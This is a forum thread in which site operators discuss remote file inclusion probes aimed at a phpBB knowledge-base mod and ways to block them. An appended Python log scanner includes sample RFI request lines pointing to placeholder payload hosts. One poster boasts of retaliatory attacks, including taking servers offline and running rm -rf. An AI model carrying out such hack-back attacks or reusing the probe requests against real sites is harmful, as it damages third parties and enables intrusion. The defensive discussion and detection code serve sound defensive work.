So, I'm looking at the "Who's Online" for one of the vBulletin forums I frequent and see where someone with a Norwegian IP address is trying to access: I added spaces to the domain to prevent the URL from being read by search engines. I Googled kb_constants.php and see that it is a phpBB knowledge base mod (with a known security vulnerability). The forum happens to be the Project Management Knowledge Base. I think it's easy to see why their bot targeted the site. So, I check out the e t r i p l e.com site and see it is some sort of wireless service site. Checking the whois info, I see they are based in the USA. I checked out the r57.txt file that is on their server and it's PHP source code from some Russian hacker. I wonder if the e t r i p l e.com folks even know it's there. The file is placed inside a directory for their X-Cart script. Should I pursue getting the Norwegian IP on a blacklist? Should I contact the e t r i p l e.com site owner? What would you suggest/do?
If you look at the text file, it's more than likely a script of some type that is meant to run on your server and give them the information they'd need about your site. Before you go and block it, go and see if you can update the software first (i.e. they have fixed the hole). If not, try and block it with your .htaccess file, something like RewriteRule ^includes/kb_constants.php?module_root_path=(*.).txt$ [F,L] (not sure if that rule will work - wrote it outta my head without testing it).
I don't think you understood. The site being hit by the exploit attempt is running vBulletin. The exploit is for a phpBB mod (add-on). The site is in no danger. It is not using the mod that is being targeted. I believe the site is being targeted only because it has the words "knowledge base" in the title (which is the name of the phpBB mod that they are trying to exploit). Also, I don't think blocking the IP would matter. A few days ago, I saw 3 more attempts at this exploit from 3 new IPs and using 2 different exploit scripts (i.e. not e t r i p l e.com). I believe the hackers are using compromised machines to send the exploit attempts.
I get some requests for a lot of strange files on many of my sites. I don't care about it really; it does no harm.
I second BTS - mod_security is almost a must these days - and be prepared to see a lot more inbound hack attempts than you thought! You'll also get to see a lot of stupid attempts complete with misspeeellings and all - and yes, mention the word CMS in a web page and prepare for the onslaught of the stupid.
Well people try and hack me all the time, I invite it and love it actually.. I simply hack them back.. I have a serious if you play with me I'll play with you policy.. Had this one AIX server at some college scan me, I dropped that AIX box off the internet in about 5 minutes. I SIMPLY love it when people try and hack me. I know that isn't traditional but who cares, if they have the balls to scan me so hard my IDS blows up well I have the balls to drop their server off the internet and maybe rm -rf /* but I only do that when drunk like now
It sounds like they are using an automated exploit-finding script. It probably just searches for trip words associated with vulnerable systems (e.g. Knowledge Base, as you said) and attempts to exploit them, for whatever reason. This is all I can think of. A human hacker would likely realize that they're in the wrong place.
No point in wasting your time running around trying to get them blacklisted; just block the IP on your firewall. A lot of hackers will use proxy servers anyway when making an attack on your site, so trying to track them down or report them is just fruitless.
What often happens is a cracker gains access to upload a file to a remote web server. They are not able to execute the file on that server, so they name it .txt and put an exploit in it. At that point they use that server to exploit other sites, quite often through cross-site scripting (XSS). On top of that, most of the time the IP address that is in your logs is a proxy. This means there is not much you can do besides block the address. I have found that if you contact the person in charge of the web server they are often grateful. I've done that quite a few times and helped them resolve the issue with their server.
chickens, that is exactly what I suspected was happening in the case I observed. I never did follow up with etriple.com though.
Bernard: Yeah, I go through my mod_security logs about once a week and check to see if the files still exist on the remote server. If they do then I contact the web site admin with a quick email.
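The weekly log review described above, and the pattern chickens describes (a .txt exploit parked on someone else's server and referenced from a query string), can be automated. This is an added example, not code from any poster; the log lines, hosts and addresses are constructed placeholders, and the `LOG_RE` pattern and function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format). Hosts, paths
# and addresses are placeholders, not real indicators from the thread.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2007:11:02:13 +0000] "GET /includes/kb_constants.php?module_root_path=http://example.net/xcart/r57.txt HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.4 - - [10/Mar/2007:11:03:01 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2007:11:05:40 +0000] "GET /kb/index.php?path=ftp://198.51.100.77/sh.txt HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Query-string values that are absolute URLs are the tell-tale of a remote
# file inclusion probe, regardless of which script name the bot is guessing.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return (client_ip, parameter, remote_url) for each request whose query
    string passes an absolute URL as a parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append((m.group("ip"), name, value))
    return hits


def hosting_servers(hits):
    """Distinct hosts serving the referenced files: these are the (usually
    unwitting) server owners worth notifying, as the thread suggests."""
    return sorted({urlsplit(url).hostname for _, _, url in hits})


if __name__ == "__main__":
    attempts = find_rfi_attempts(SAMPLE_LOG)
    for ip, param, url in attempts:
        print(f"{ip} probed {param}={url}")
    print("hosts to contact:", ", ".join(hosting_servers(attempts)))
```

Feed it a real access log and the second list is the set of admins to email; the first list is what you would block or hand to mod_security.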